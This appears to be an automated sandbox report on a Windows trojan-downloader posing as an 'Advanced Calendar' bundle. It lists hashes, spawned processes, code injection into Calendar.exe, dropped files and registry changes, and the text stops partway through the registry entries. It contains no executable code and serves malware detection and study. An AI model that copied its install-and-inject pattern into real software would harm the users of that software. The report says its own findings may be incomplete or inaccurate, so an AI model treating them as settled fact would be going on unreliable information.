Trojan-Downloader.Win32.Agent.wtkzi (Kaspersky), Gen:Variant.Zusy.178812 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5ef2c67ca0d12eac12e1f3db9dd7ddc3
SHA1: c53635e5603d37eb8c95b2027ab52a4e068391b3
SHA256: 1d7fc913b8190e48f0f38f5844cbcd5455f7ea251d447b0d2238b4648c653492
SSDeep: 24576:V6Yi atnhL9tsEyi xhtPl NcsJupQqku14w4:of gnhL9NyX4qsupn4
Size: 955891 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-12-27 07:38:55
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
imapi.exe:1932
InstallHelper.exe:3084
InstallHelper.exe:3480
nst6.tmp.exe:2736
nst6.tmp.exe:2804
CalendarServ.exe:3180
CalendarServ.exe:3156
yeaplayer_br_ibd_bundle.exe:2328
%original file name%.exe:1216
rundll32.exe:1976
setup.exe:1948
setup.exe:348
291734.exe:2712
The Trojan injects its code into the following process(es):
Calendar.exe:3428
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process imapi.exe:1932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\g5z08pj0.TMP (146970 bytes)
The process InstallHelper.exe:3084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
The process InstallHelper.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)
The process nst6.tmp.exe:2736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Documents\Tools\Common\I18N\conf.db (759 bytes)
The process CalendarServ.exe:3180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Application Data\CalendarTool\dump\BugReportConfig.ini (940 bytes)
%Documents and Settings%\All Users\Documents\Baidu\Common\I18N\conf.db (759 bytes)
The process CalendarServ.exe:3156 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (170 bytes)
The process yeaplayer_br_ibd_bundle.exe:2328 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (24 bytes)
C:\MINI.LOG (5089 bytes)
%Documents and Settings%\All Users\Documents\Guid\Common\I18N\conf.db (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (27681 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe.info (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6\291734.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\61807c4bafc26bb2ed98e3e60f587cd6 (0 bytes)
The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P5SDE3AF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDYJ45YV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (50903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6KWD5RP0\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QY4FSATI\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\INetC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
The process setup.exe:1948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\11082\YeaPlayer_br_IBD_Bundle.exe (141913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11075\51486_a.xml (8672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\cookies (188 bytes)
%Documents and Settings%\%current user%\Application Data\YeaPlayer_br_IBD_Bundle.exe (4185 bytes)
The process Calendar.exe:3428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\CalendarTool\dump\BugReportConfig.ini (340 bytes)
The process 291734.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_pressed.png (172 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Festival.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_color.png (440 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarEntry.dll (4316 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_grey.png (248 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashUL.exe (8165 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival.json (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_hover.png (174 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_pressed.png (189 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_normal.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_half.png (217 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_normal.png (481 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_up.png (132 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Festival.json (16 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_hover.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Report.exe (5902 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_unselect.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_frame.png (1260 bytes)
%Program Files%\CalendarTool\2.0.0.11189\calendar.exe (47962 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_classsic.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_half.png (443 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReport.exe (16453 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_normal.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Festival.json (12 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPKernel.dll (23698 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Language.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (11 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_today_normal.png (177 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe (2318 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_normal.png (994 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_scroll_disabled.png (179 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_hover.png (993 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_selected.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero1.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_hover.png (949 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_aero.png (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_grey.png (452 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_right_pressed.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\img_arrow_down.png (131 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config8\Festival.json (15 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_normal.png (519 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_left_hover.png (995 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Festival_special.json (6 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_modern.png (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_pen_color.png (235 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_color.png (606 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPConfig.ini (234 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_mode_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_menu.png (989 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchup_hover.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_half.png (348 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_clover_color.png (509 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_grey.png (417 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPNet.dll (11930 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config9\Language.json (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPHelp.dll (10720 bytes)
%Program Files%\CalendarTool\2.0.0.11189\CrashReportModuleConf.ini (673 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_checkbox_normal.png (955 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPDR.dll (10408 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\skin.xml (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config7\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\Config-3\Config.json (3 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_radio_normal.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\scroll.bmp (1568 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\btn_switchdown_pressed.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (19114 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_heart_half.png (307 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\main_bg_bottom.png (8 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\bg_main.png (1 bytes)
%Program Files%\CalendarTool\2.0.0.11189\EVPTask.dll (13763 bytes)
%Program Files%\CalendarTool\2.0.0.11189\DefaultConfig\Config.json (2 bytes)
%Program Files%\CalendarTool\2.0.0.11189\skin\images\icn_money_grey.png (576 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd5.tmp (0 bytes)
Registry activity
The process imapi.exe:1932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 D1 1C CB 70 45 7A A0 D0 0B 82 18 85 7F 8C 74"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"ControlFlags" = "1"
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"BitNames" = " ImapiDebugError ImapiDebugWarning ImapiDebugTrace ImapiDebugInfo ImapiDebugX ImapiDebugSort"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\Imapi\ImapiSvc]
"Guid" = "8107d8e9-e323-49f5-bba2-abc35c243dca"
The process InstallHelper.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Control\TimeZoneInformation]
"ActiveTimeBias" = "4294967176"
[HKLM\SOFTWARE\CalendarTool]
"Version" = "2.0.0.11189"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\CalendarTool\INSTALL_MARK]
"Version" = "2.0.0.11189"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"UninstallString" = "%Program Files%\CalendarTool\2.0.0.11189\InstallHelper.exe -Uninstall English"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\CalendarTool]
"PartnerId" = "YeaPlayer|br|IBD|Bundle"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayIcon" = "%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\CalendarTool]
"INSTALL_FIRST_TIME" = "2016-05-03_04:55:47"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayFullVersion" = "2.0.0.11189"
[HKLM\SOFTWARE\CalendarTool]
"UserId" = "61807c4bafc26bb2ed98e3e60f587cd6"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 5D 7F D0 86 D4 C2 1B B5 7E 30 04 72 D5 B9 A4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\CalendarTool]
"FrID" = "ClwS01UkXONz6DdlNQFq0y97Bu1dKUCqMKc="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayVersion" = "2.0.0.11189"
"Publisher" = "MEIXIAN XIE"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}]
"DisplayName" = "Advanced Calendar 2.0.0.11189"
[HKLM\SOFTWARE\CalendarTool]
"parentName" = "setup.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\CalendarTool\2.0.0.11189]
"install_path" = "%Program Files%\CalendarTool\2.0.0.11189"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallHelper\DEBUG]
"Trace Level"
The process InstallHelper.exe:3480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 51 D7 E3 70 D0 78 6F A0 B2 1E 2B 0F 84 47 49"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process nst6.tmp.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 09 35 66 49 82 C4 B6 06 8B 85 05 2C 1E B8 CE"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\nst6.tmp\DEBUG]
"Trace Level"
The process nst6.tmp.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\CalendarTool\QUIT]
"QuitSession" = "{0A3A8827-4F83-49DA-9BB3-1E089656E7AC}-1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 AE 47 DD 19 BB A4 13 6E DE A7 71 AB E9 3B F7"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process CalendarServ.exe:3180 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
